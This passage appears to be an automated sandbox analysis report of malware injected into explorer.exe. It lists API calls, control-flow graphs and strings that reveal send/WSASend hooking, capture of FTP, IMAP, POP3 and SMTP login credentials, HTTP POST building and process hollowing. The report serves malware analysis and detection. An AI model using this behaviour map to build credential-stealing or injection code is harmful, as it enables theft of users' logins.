                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 0300267A
                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03002685
                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0300269F
                                                                                                                                      • wsprintfA.USER32 ref: 030026B6
                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 030026CF
                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 030026D9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                      • String ID: %02X
                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                      • Opcode ID: 198d8a3905aa3af4b3670095fe2e034ef9b692d04e27838a2018ed95a3df3033
                                                                                                                                      • Instruction ID: a2ddac5e3bd40b2578c804c37de946dd33eaccc9748611573938cb34b40944cd
                                                                                                                                      • Opcode Fuzzy Hash: 198d8a3905aa3af4b3670095fe2e034ef9b692d04e27838a2018ed95a3df3033
                                                                                                                                      • Instruction Fuzzy Hash: 25116D75902108BFEB12AB95ED88FEEBFBCEB48305F1040A1F645E2140D7354E019B60
                                                                                                                                      Function 03001332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0300109E,?,03001010), ref: 0300134A
                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000003,?,0300109E,?,03001010), ref: 0300135B
                                                                                                                                      • wsprintfA.USER32 ref: 03001372
                                                                                                                                        • Part of subcall function 0300263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0300265A
                                                                                                                                        • Part of subcall function 0300263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03002672
                                                                                                                                        • Part of subcall function 0300263E: lstrlen.KERNEL32(?,00000000), ref: 0300267A
                                                                                                                                        • Part of subcall function 0300263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 03002685
                                                                                                                                        • Part of subcall function 0300263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0300269F
                                                                                                                                        • Part of subcall function 0300263E: wsprintfA.USER32 ref: 030026B6
                                                                                                                                        • Part of subcall function 0300263E: CryptDestroyHash.ADVAPI32(?), ref: 030026CF
                                                                                                                                        • Part of subcall function 0300263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 030026D9
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03001389
                                                                                                                                      • GetLastError.KERNEL32 ref: 0300138F
                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 030013A1
                                                                                                                                        • Part of subcall function 030024D5: GetCurrentProcessId.KERNEL32 ref: 030024E7
                                                                                                                                        • Part of subcall function 030024D5: GetCurrentThreadId.KERNEL32 ref: 030024EF
                                                                                                                                        • Part of subcall function 030024D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030024FF
                                                                                                                                        • Part of subcall function 030024D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0300250D
                                                                                                                                        • Part of subcall function 030024D5: CloseHandle.KERNEL32(00000000), ref: 03002566
                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 030013B8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030013BF
                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 030013E4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030013EB
                                                                                                                                        • Part of subcall function 03001DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 03001E1D
                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0300141D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                      • API String ID: 706757162-1430290102
                                                                                                                                      • Opcode ID: 68e7ee9d988422b04dcb84e66637653924e7e9b2a5568b148787e9b8a2f9c25b
                                                                                                                                      • Instruction ID: 8293232b1d1b98df35735a811cb208f6564a2e15f16feed04c7e245a291e2bc1
                                                                                                                                      • Opcode Fuzzy Hash: 68e7ee9d988422b04dcb84e66637653924e7e9b2a5568b148787e9b8a2f9c25b
                                                                                                                                      • Instruction Fuzzy Hash: CD31B43C343304BBEB06FFA2DD1DB9E7A59AF45705F004454F6069B6D1CB7989118B90
                                                                                                                                      Function 03001647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 236 3001647-300165a 237 3001660-3001662 236->237 238 3001748-300174f 236->238 237->238 239 3001668-300166b 237->239 239->238 240 3001671-300167d lstrlen 239->240 241 3001683-300168a lstrlen 240->241 242 3001747 240->242 241->242 243 3001690-30016a8 getpeername 241->243 242->238 243->242 244 30016ae-30016ca inet_ntoa htons 243->244 244->242 245 30016cc-30016d4 244->245 246 30016d6-30016d9 245->246 247 3001708 245->247 249 30016f3-30016f8 246->249 250 30016db-30016de 246->250 248 300170d-300173c call 3002861 wsprintfA call 30024ae 247->248 248->242 260 300173e-3001745 call 3002843 248->260 249->248 252 30016e0-30016e3 250->252 253 3001701-3001706 250->253 255 30016e5-30016ea 252->255 256 30016fa-30016ff 252->256 253->248 255->249 258 30016ec-30016f1 255->258 256->248 258->242 258->249 260->242
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                      • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                      • API String ID: 3379139566-1703351401
                                                                                                                                      • Opcode ID: d3bca9882b963b3646142f6b41517c4200e32a90eb0954bfe5f4eee3077752d3
                                                                                                                                      • Instruction ID: b1121a8a96e20d0b5429c6097d1c9fb2a4437b8d7a6c217776d4468d2fb67d75
                                                                                                                                      • Opcode Fuzzy Hash: d3bca9882b963b3646142f6b41517c4200e32a90eb0954bfe5f4eee3077752d3
                                                                                                                                      • Instruction Fuzzy Hash: 8A21883DA02205A7FB5ADEADCD885BFBAFD9B49301F0C41B9D908D3194D734C9018751
                                                                                                                                      Function 03001752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 268 3001752-3001774 GetModuleHandleA GetProcAddress 269 30017c1-30017c6 268->269 270 3001776-30017c0 RtlZeroMemory * 4 268->270 270->269
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,03001539,?,?,?,0300144B,?), ref: 03001763
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0300176A
                                                                                                                                      • RtlZeroMemory.NTDLL(03004228,00000104), ref: 03001788
                                                                                                                                      • RtlZeroMemory.NTDLL(03004118,00000104), ref: 03001790
                                                                                                                                      • RtlZeroMemory.NTDLL(03004330,00000104), ref: 03001798
                                                                                                                                      • RtlZeroMemory.NTDLL(03004000,00000104), ref: 030017A1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                      • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                      • API String ID: 1490332519-278825019
                                                                                                                                      • Opcode ID: 1608de3762e92475f18eaa764b7025f067cc5d1804ac43e42c444a46ec4cc719
                                                                                                                                      • Instruction ID: 81c27c9f3d520eff6c2334cb94e5b596d21ea3dc4338e060a0300122295ee9bb
                                                                                                                                      • Opcode Fuzzy Hash: 1608de3762e92475f18eaa764b7025f067cc5d1804ac43e42c444a46ec4cc719
                                                                                                                                      • Instruction Fuzzy Hash: E5F0897678332C3BE111B3ABAD06D4FBD5CC651DA6F420191B7546B183889969004DFC
                                                                                                                                      Function 030024D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 030024E7
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 030024EF
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030024FF
                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 0300250D
                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0300252C
                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0300253C
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0300254B
                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0300255B
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03002566
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                      • Opcode ID: 7e833180e3981e57bbf0f2262039a1ed8b0e4fb477223ea027243faa73d17dfc
                                                                                                                                      • Instruction ID: 59d289eb75f6b102a705d0b7767a8668a846e8e71c84425e558ba169f73a5d7c
                                                                                                                                      • Opcode Fuzzy Hash: 7e833180e3981e57bbf0f2262039a1ed8b0e4fb477223ea027243faa73d17dfc
                                                                                                                                      • Instruction Fuzzy Hash: 9211867540B201EFE702EFA1A52C76FBBA8FF4570AF040959F58192144D73895458BA6
                                                                                                                                      Function 03001F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 282 3001f4a-3001fa5 call 30022b8 call 3002861 call 30027e2 call 3002374 291 3001fc0-3001fcc 282->291 292 3001fa7-3001fbe 282->292 295 3001fd0-3001fd2 291->295 292->295 296 30022a6-30022b5 call 3002843 295->296 297 3001fd8-300200f RtlZeroMemory 295->297 301 3002015-3002030 297->301 302 300229e-30022a5 297->302 303 3002062-3002074 301->303 304 3002032-3002043 call 30022e5 301->304 302->296 311 3002078-300207a 303->311 309 3002045-3002054 304->309 310 3002056 304->310 314 3002058-3002060 309->314 310->314 312 3002080-30020dc call 3002731 311->312 313 300228b-3002291 311->313 322 30020e2-30020e7 312->322 323 3002284 312->323 317 3002293-3002295 call 3002843 313->317 318 300229a 313->318 314->311 317->318 318->302 324 3002101-300212f call 3002861 wsprintfW 322->324 325 30020e9-30020fa 322->325 323->313 328 3002131-3002133 324->328 329 3002148-300215f 324->329 325->324 330 3002134-3002137 328->330 334 3002161-3002197 call 3002861 wsprintfW 329->334 335 300219e-30021b8 329->335 332 3002142-3002144 330->332 333 3002139-300213e 330->333 332->329 333->330 336 3002140 333->336 334->335 340 3002261-3002277 call 3002843 335->340 341 30021be-30021d1 335->341 336->329 348 3002280 340->348 349 3002279-300227b call 3002843 340->349 341->340 345 30021d7-30021ed call 3002861 341->345 351 30021ef-30021fa 345->351 348->323 349->348 353 30021fc-3002209 call 3002826 351->353 354 300220e-3002225 351->354 353->354 358 3002227 354->358 359 3002229-3002236 354->359 358->359 359->351 360 3002238-300223c 359->360 361 3002256-300225d call 3002843 360->361 362 300223e 360->362 361->340 363 300223e call 3002815 362->363 365 3002243-3002250 RtlMoveMemory 363->365 365->361
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                        • Part of subcall function 030027E2: lstrlen.KERNEL32(030040DA,?,00000000,00000000,03001F86,75568A60,030040DA,00000000), ref: 030027EA
                                                                                                                                        • Part of subcall function 030027E2: MultiByteToWideChar.KERNEL32(00000000,00000000,030040DA,00000001,00000000,00000000), ref: 030027FC
                                                                                                                                        • Part of subcall function 03002374: RtlZeroMemory.NTDLL(?,00000018), ref: 03002386
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 03001FE2
                                                                                                                                      • wsprintfW.USER32 ref: 0300211B
                                                                                                                                      • wsprintfW.USER32 ref: 03002186
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03002250
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                      • Opcode ID: b318bed7bd4ae4c4191b87012e788258fb12badd9ac5364d9056ab99ffd407d5
                                                                                                                                      • Instruction ID: 4ae8ded1f34aa5b1d651977217f5e4d5e5c113f35b97e8f1e7ab46a389a26961
                                                                                                                                      • Opcode Fuzzy Hash: b318bed7bd4ae4c4191b87012e788258fb12badd9ac5364d9056ab99ffd407d5
                                                                                                                                      • Instruction Fuzzy Hash: 46A1827560A305AFE751EF68C888A6BBBECFB88344F04482DF985D7291DB74D9048B52
                                                                                                                                      Function 030025AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 367 30025ad-30025c9 OpenProcess 368 3002600-3002607 367->368 369 30025cb-30025da IsWow64Process 367->369 370 30025f7 369->370 371 30025dc-30025ec IsWow64Process 369->371 372 30025f9-30025fa CloseHandle 370->372 371->372 373 30025ee-30025f5 371->373 372->368 373->372
                                                                                                                                      APIs
                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,7556E800,?,?,microsoftedgecp.exe,03001287), ref: 030025BF
                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 030025D1
                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 030025E4
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 030025FA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                      • String ID: microsoftedgecp.exe
                                                                                                                                      • API String ID: 331459951-1475183003
                                                                                                                                      • Opcode ID: a234a0e78d0b02004479ccb0ee33545865a309f3902067b5b9cc30bf78b889e1
                                                                                                                                      • Instruction ID: 7c2c201dfeca061360faf3d071773d6a897aad7e3c90229162e3ab6fac2edaea
                                                                                                                                      • Opcode Fuzzy Hash: a234a0e78d0b02004479ccb0ee33545865a309f3902067b5b9cc30bf78b889e1
                                                                                                                                      • Instruction Fuzzy Hash: D6F09075903618FFEB51DF909A989EFB7ACEB01255F1402AAF90092180D7354E04EAA4
                                                                                                                                      Function 03001B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 422 3001b17-3001b2c 423 3001b60-3001b68 422->423 424 3001b2e 422->424 425 3001bc3-3001bcb 423->425 426 3001b6a-3001b6f 423->426 427 3001b30-3001b5e RtlMoveMemory 424->427 429 3001c0b 425->429 430 3001bcd-3001bdf 425->430 428 3001bbe-3001bc1 426->428 427->423 427->427 428->425 432 3001b71-3001b84 LoadLibraryA 428->432 431 3001c0d-3001c12 429->431 430->429 433 3001be1-3001bfe LdrProcessRelocationBlock 430->433 434 3001c15-3001c17 432->434 435 3001b8a-3001b8f 432->435 433->429 436 3001c00-3001c04 433->436 434->431 438 3001bb6-3001bb9 435->438 436->429 437 3001c06-3001c09 436->437 437->429 437->433 439 3001b91-3001b95 438->439 440 3001bbb 438->440 441 3001b97-3001b9a 439->441 442 3001b9c-3001b9f 439->442 440->428 443 3001ba1-3001bab GetProcAddress 441->443 442->443 443->434 444 3001bad-3001bb3 443->444 444->438
                                                                                                                                      APIs
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 03001B4E
                                                                                                                                      • LoadLibraryA.KERNEL32(?,03004434,00000000,00000000,75572EE0,00000000,03001910,?,?,?,00000001,?,00000000), ref: 03001B76
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03001BA3
                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03001BF4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                      • Opcode ID: 59843c6c98ff667736937613a2960a393bd80806f8f592b53c76f2c55e8fa5c4
                                                                                                                                      • Instruction ID: f2e6b916de296c1751490423b1abaf6845308c95b3bfc7cdc959c79dd09811e6
                                                                                                                                      • Opcode Fuzzy Hash: 59843c6c98ff667736937613a2960a393bd80806f8f592b53c76f2c55e8fa5c4
                                                                                                                                      • Instruction Fuzzy Hash: 6831B479702201ABEB68CF29C895B76B7E8FF05315F08456CE886C7280E735E845CBA0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:9
                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                      execution_graph 853 809fab 854 80a1f3 853->854 855 809fd8 853->855 858 80a048 855->858 862 80a04d 858->862 859 80a190 VirtualProtect VirtualProtect 861 80a1e8 859->861 860 80a135 LoadLibraryA 860->862 861->861 862->859 862->860 863 809ff8 862->863

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_00804180 1 Function_00804000 2 Function_00802E80 3 Function_00801000 4 Function_00804084 5 Function_00801A04 6 Function_00801405 7 Function_00801508 8 Function_00801A88 9 Function_00801C08 10 Function_00802508 42 Function_008025C4 10->42 49 Function_008018D0 10->49 58 Function_008024E0 10->58 11 Function_00802E08 20 Function_00802418 11->20 48 Function_00801D50 11->48 59 Function_00801860 11->59 64 Function_008018E8 11->64 12 Function_00803088 21 Function_00802E98 12->21 69 Function_00801B70 12->69 13 Function_00804188 14 Function_0080A00A 15 Function_0080B00C 16 Function_0080410C 17 Function_0080408C 18 Function_0080188C 37 Function_00801838 18->37 19 Function_00802010 19->5 20->37 53 Function_00802054 20->53 20->59 21->5 21->11 39 Function_00802CB8 21->39 52 Function_00801DD4 21->52 71 Function_00802B70 21->71 74 Function_00802BF4 21->74 22 Function_0080409C 23 Function_0080141D 24 Function_00803220 24->9 32 Function_00801C28 24->32 34 Function_00801BB0 24->34 24->37 38 Function_00801938 24->38 61 Function_00802860 24->61 24->69 25 Function_00802620 26 Function_00801D20 27 Function_00803020 27->21 27->69 28 Function_00801822 29 Function_008040A4 30 Function_00804124 31 Function_008045A7 33 Function_00809FAB 44 Function_0080A048 33->44 35 Function_008014B2 36 Function_008040B4 39->26 39->37 39->59 40 Function_00801F40 40->37 77 Function_008018F8 40->77 41 Function_00804A41 80 Function_008025FC 42->80 43 Function_00804144 44->14 45 Function_008040CC 46 Function_0080414C 47 Function_0080424C 48->37 50 Function_00801254 51 Function_008014D4 52->37 53->18 53->19 53->37 53->38 53->40 53->49 53->59 70 Function_00801E70 53->70 53->77 54 Function_008040D4 55 Function_00801C58 56 Function_0080355C 56->24 56->37 56->56 56->69 72 Function_008030F0 56->72 57 Function_008040DC 59->69 60 Function_00801560 61->25 61->69 73 Function_00802774 61->73 62 Function_008040E4 63 Function_0080B0E8 65 Function_0080156C 66 Function_0080406C 67 Function_008040EC 68 Function_0080B0F0 71->5 71->37 72->8 72->10 72->37 72->55 72->59 75 Function_00804074 76 Function_00801576 78 Function_008014F9 79 Function_0080417A 81 Function_0080407C

                                                                                                                                      Executed Functions

                                                                                                                                      Function 0080355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 119 80355c-80356c call 801b70 122 803572-8035a5 call 801838 119->122 123 8035fc-803601 119->123 127 8035d1-8035f6 NtUnmapViewOfSection 122->127 128 8035a7 call 801838 122->128 132 803608-803617 call 803220 127->132 133 8035f8-8035fa 127->133 130 8035ac-8035c5 128->130 130->127 139 803621-80362a 132->139 140 803619-80361c call 80355c 132->140 133->123 134 803602-803607 call 8030f0 133->134 134->132 140->139
                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 008035D8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_801000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                      • Instruction ID: 4ea10be5fa6a5d7345f64f80c924029b8d23803d93bc3f9f43e87fcc7843d72c
                                                                                                                                      • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                      • Instruction Fuzzy Hash: 8911C430711E095FEF98BBBC9CAE27937A4FB14312F54013AA419C76E1DA398A40C701
                                                                                                                                      Function 00803220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 803220-80325b call 801838 3 803261-803273 CreateToolhelp32Snapshot 0->3 4 803549-803554 SleepEx 3->4 5 803279-80328f Process32First 3->5 4->3 6 803538-80353a 5->6 7 803540-803543 CloseHandle 6->7 8 803294-8032ac 6->8 7->4 10 8032b2-8032c6 8->10 11 80348c-803495 call 801bb0 8->11 10->11 15 8032cc-8032e0 10->15 16 80352a-803532 Process32Next 11->16 17 80349b-8034a4 call 801c08 11->17 15->11 21 8032e6-8032fa 15->21 16->6 17->16 22 8034aa-8034b1 call 801c28 17->22 21->11 26 803300-803314 21->26 22->16 27 8034b3-8034c1 call 801b70 22->27 26->11 32 80331a-80332e 26->32 27->16 31 8034c3-803525 call 801938 call 802860 call 801938 27->31 31->16 32->11 36 803334-803348 32->36 36->11 41 80334e-803362 36->41 41->11 44 803368-80337c 41->44 44->11 46 803382-803396 44->46 46->11 48 80339c-8033b0 46->48 48->11 50 8033b6-8033ca 48->50 50->11 52 8033d0-8033e4 50->52 52->11 54 8033ea-8033fe 52->54 54->11 56 803404-803418 54->56 56->11 58 80341a-80342e 56->58 58->11 60 803430-803444 58->60 60->11 62 803446-80345a 60->62 62->11 64 80345c-803470 62->64 64->11 66 803472-803486 64->66 66->11 66->16
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_801000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2482764027-0
                                                                                                                                      • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                      • Instruction ID: 5ca6b80de1247032089130549fa17b210f7aabc9b98b1d939babecef580a905d
                                                                                                                                      • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                      • Instruction Fuzzy Hash: D3813431218B088FE756EF54EC98BEAB7A5FF61741F44461AA443C71A0EF78DA04CB91
                                                                                                                                      Function 0080A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
